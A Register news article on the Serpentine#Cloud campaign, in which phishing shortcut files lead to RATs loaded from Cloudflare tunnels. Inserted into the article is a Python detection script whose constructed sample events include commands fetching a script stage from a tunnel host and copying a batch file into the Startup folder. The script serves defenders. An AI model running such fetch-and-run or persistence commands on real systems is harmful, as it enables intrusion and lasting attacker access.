Sneaky Serpentine#Cloud slithers through Cloudflare tunnels • The Register


A sneaky malware campaign slithers through Cloudflare tunnel subdomains to execute in-memory malicious code and give unknown attackers long-term access to pwned machines.

Securonix threat hunters spotted the ongoing campaign dubbed Serpentine#Cloud, and told us it’s “medium- to large-scale,” and “still very active today,” according to the security shop’s senior researcher, Tim Peck.

While the total number of infections remains unknown, “the campaign appears to be rather widespread as there was no clear sector, industry or country involved,” Peck told The Register.

“Identified telemetry indicates a large overall footprint with observed infections in many Western countries like the United States, the United Kingdom or Germany,” he added. “We also identified quite a few samples with origins pointing to Singapore and India.”

Securonix hasn’t attributed this campaign to an individual or crime crew, but notes that its use of English-language comments in the code and focus on Western targets suggests English speakers who are “somewhat sophisticated” and “testing scalable delivery methods.”

“The use of a disposable infrastructure and staged delivery payloads implies the actor is prioritizing stealth and operational agility, allowing them to adapt quickly,” Peck said.


The attack starts off with an invoice-themed phishing email that contains a Windows shortcut (.lnk) file disguised as a PDF document. Once the victim clicks on the malicious shortcut, it “kicks off a rather elaborate attack chain consisting of a combination of batch, VBScript and Python stages to ultimately deploy shellcode that loads a Donut-packed PE payload,” Peck wrote in a Wednesday report.

To host and deliver these payloads, the criminals use Cloudflare’s TryCloudflare tunneling services, a legit tool commonly used by developers to expose a server to the internet without opening any ports. 

This helps the attackers increase their stealthiness in delivering malware in a couple of ways: first, because TryCloudflare is used for legitimate testing and development purposes, most organizations don’t block it or monitor its traffic. Cloudflare’s TLS certificates also allow the malicious traffic to better blend in with normal network activity and bypass domain-blocking tools. 

Plus, using Cloudflare’s tunnels means the attackers don’t need to register domains or rent VPS servers, which makes attribution and takedowns by security researchers more difficult.

Cloudflare did not immediately respond to The Register’s request for comment. We will update this story if we hear back.

Once the victim clicks on the malicious shortcut file, it triggers a multi-stage infection that uses native Windows tools and legitimate WebDAV transport over HTTPS to further evade anti-virus detection and execute payloads from various remote Cloudflare domains. All of these domains are listed at the end of the Securonix report, so we’d highly suggest checking them out.

Stage two of the attack downloads and executes a Windows Script File, which functions as a VBScript-based loader. The purpose of this file “is to execute a simple command which will download and execute the next stage payload (stage 3), kiki.bat from yet another remote CloudFlare domain,” Peck wrote. 

Stage three, a heavily obfuscated batch file, again “designed for stealth and persistence,” deploys a decoy PDF, checks for antivirus software, downloads and executes Python shellcodes, and establishes persistence through the Windows startup folder. 

Finally, these Python shellcodes run Donut-packed payloads including AsyncRAT or Revenge RAT in memory, so they never touch the disk, and ultimately give the attackers “full command and control over the host,” according to the research.
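For defenders, the chain described above leaves several observable traces in process-creation telemetry: a double-extension shortcut, a script host pulling a stage from a TryCloudflare subdomain over a WebDAV-over-HTTPS UNC path, and a file dropped into the Startup folder. The following is an added triage example, not code from Securonix or The Register; the event records, hostnames, and file names other than kiki.bat are constructed for illustration, and the field names are only assumed to resemble Sysmon process-creation events.

```python
import re

# Constructed process-creation events (field names loosely modelled on
# Sysmon Event ID 1). Hostnames and file names are made up for the example.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\explorer.exe" C:\Users\bob\Downloads\Invoice_2025.pdf.lnk'},
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe \\quiet-sample-words.trycloudflare.com@SSL\DavWWWRoot\stage2.wsf'},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c copy kiki.bat "C:\Users\bob\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"'},
    {"image": r"C:\Program Files\Python311\python.exe",
     "cmdline": r'python.exe C:\Users\bob\AppData\Local\Temp\loader.py'},
    {"image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r'svchost.exe -k netsvcs -p'},
]

# Any TryCloudflare quick-tunnel hostname (random-words.trycloudflare.com).
TRYCF_HOST = re.compile(r'\b[a-z0-9-]+\.trycloudflare\.com\b', re.I)
# Windows WebDAV-over-HTTPS UNC syntax: \\host@SSL[@port]\[DavWWWRoot\]...
WEBDAV_UNC = re.compile(r'\\\\[^\\\s]+@SSL(@\d+)?\\(DavWWWRoot\\)?', re.I)
# Shortcut masquerading as a document via a double extension.
DOUBLE_EXT_LNK = re.compile(r'\.(pdf|docx?|xlsx?)\.lnk\b', re.I)
# Persistence via the per-user Startup folder.
STARTUP_DIR = re.compile(r'\\Start Menu\\Programs\\Startup\\', re.I)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "cmd.exe", "python.exe", "powershell.exe")


def analyze_event(ev):
    """Return the names of the indicators that fire on a single event."""
    cmd = ev["cmdline"]
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    hits = []
    if TRYCF_HOST.search(cmd):
        hits.append("trycloudflare_host")
    if WEBDAV_UNC.search(cmd):
        hits.append("webdav_ssl_unc")
    if DOUBLE_EXT_LNK.search(cmd):
        hits.append("lnk_double_extension")
    if STARTUP_DIR.search(cmd):
        hits.append("startup_folder_write")
    # A script host fetching its next stage from a tunnel is the strongest signal.
    if image in SCRIPT_HOSTS and ("trycloudflare_host" in hits or "webdav_ssl_unc" in hits):
        hits.append("script_host_remote_stage")
    return hits


def triage(events):
    """Map event index -> fired indicators, keeping only events with at least one hit."""
    return {i: h for i, ev in enumerate(events) if (h := analyze_event(ev))}
```

Note that the in-memory Python shellcode stage (event 3 above) produces no hit here; catching it needs memory or ETW telemetry rather than command-line matching alone.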

“With stealthy persistence over the infected host the attacker has the ability to steal passwords, browser/session data, exfiltrate sensitive data or attempt to move laterally to other systems,” Peck wrote. ®


